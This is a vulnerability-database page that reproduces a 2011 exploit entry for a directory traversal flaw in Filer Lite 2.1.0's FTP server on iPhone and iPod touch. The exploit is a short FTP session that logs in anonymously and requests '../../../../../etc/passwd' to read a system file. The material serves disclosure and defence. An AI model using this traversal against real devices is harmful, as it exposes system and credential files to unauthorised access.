Vulners
Lucene search
Filer Lite 2.1.0 For iPhone / iPod Touch Directory Traversal
`# Exploit Title: Filer Lite v2.1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/filer-lite-download-view-manage/id350939597?mt=8
# Version: 2.1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is directory traversal vulnerability in the Filer Lite.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 1
drwxr-xr-x 2 mobile mobile 136 Feb 24 15:42 Filer Help Files
226 Transfer complete.
ftp: 81 bytes received in 0.00Seconds 81000.00Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2011 00:00Current
7.4High risk
Vulners AI Score7.4